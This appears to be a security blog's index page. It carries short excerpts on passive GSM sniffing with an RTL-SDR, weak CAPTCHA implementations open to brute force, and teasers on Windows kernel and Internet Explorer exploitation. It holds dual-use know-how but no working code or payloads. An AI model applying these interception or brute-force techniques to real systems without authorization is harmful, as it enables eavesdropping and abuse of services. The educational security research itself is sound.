I have been working on Telecom Security and Software defined radio since a few months and I noticed that there are very limited resources on the internet for beginners who want to get into telecom security. Not many people from security industry are into this and very less information has been shared online. I would be sharing here whatever I have gained in past few months in a series of blog posts. Now, before getting into active security analysis of GSM networks, let’s first see what we can do by just passively sniffing the airwaves around us. To sniff RF waves around us, the best way is get your hands on a SDR. What is a SDR? According to Wikipedia, Software-defined radio (SDR) is a radio communication system where components that have been typically implemented in hardware (e.g. mixers, filters, amplifiers, modulators/demodulators, detectors, etc.) are instead implemented by means of software on a personal computer or embedded system. In simple terms, It refers to a technique in which all the processing is done in software. The processing mentioned include mixing, filtering, demodulation etc. We can use a SDR to capture airwaves when tuned to a particular frequency. The range of frequency it can capture and the bandwidth differs with different SDR devices. Here, we would be using RTL-SDR, the cheapest one available, to sniff over GSM....

27 May 2017

Is your Captcha really secure?

Captcha is the challenge solving test used in the computing to distinguish between the human and machine. It is implemented as one of the security feature to stop automation of any process. But what if the any small piece of code is able to solve that challenge and is successful in impersonating the application that the form is been submitted by the human. While performing Web Application Security Assessment for different web application we came across many wrong implementation of Captcha being done by the developer. So here are some of the common mistakes made by the developer while implementing Captcha in your application: Using only numbers with the small length of string. The permutation and combination required to brute force the captcha will be less. Here the length of string is 4. To brute force above string total number of tries will be 10*10*10*10=10000, which is very less....

05 August 2016

Uninitialized Stack Variable – Windows Kernel Exploitation

INTRODUCTION We are going to discuss about use of Uninitialized Stack Variable vulnerability. This post will brief you about what is an uninitialized variable, what could be the adverse effect of ...

18 January 2016

From Crash To Exploit: Cve-2015-6086 – Out Of Bound Read/aslr Bypass

INTRODUCTION This is a story of an Out of Bound Read bug in Internet Explorer 9-11. This is almost 5 years old bug which got discovered in April 2015. It is a very interesting bug, at least from m...

28 May 2015

Hacksys Extreme Vulnerable Driver

INTRODUCTION HackSys Extreme Vulnerable Driver is intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level. Hack...